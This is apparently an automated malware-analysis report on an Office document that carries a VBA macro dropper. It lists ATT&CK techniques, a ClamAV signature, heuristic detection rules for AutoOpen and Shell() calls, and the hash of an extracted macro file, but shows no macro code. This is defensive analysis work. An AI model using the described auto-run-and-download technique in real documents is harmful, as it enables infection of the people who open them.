Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Autoopen macro and a Shell() call within the VBA code indicate that the macro is designed to execute arbitrary commands. The script attempts to construct a command string, likely for downloading and executing a secondary payload, which is a common dropper behavior.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6576135-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6576135-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11150 bytes | c9e2914a08625673da5590f498a8c9aa3d42286b3126c2b24a1d875db1a5a391 |
Preview script (first 1,000 lines of the extracted script):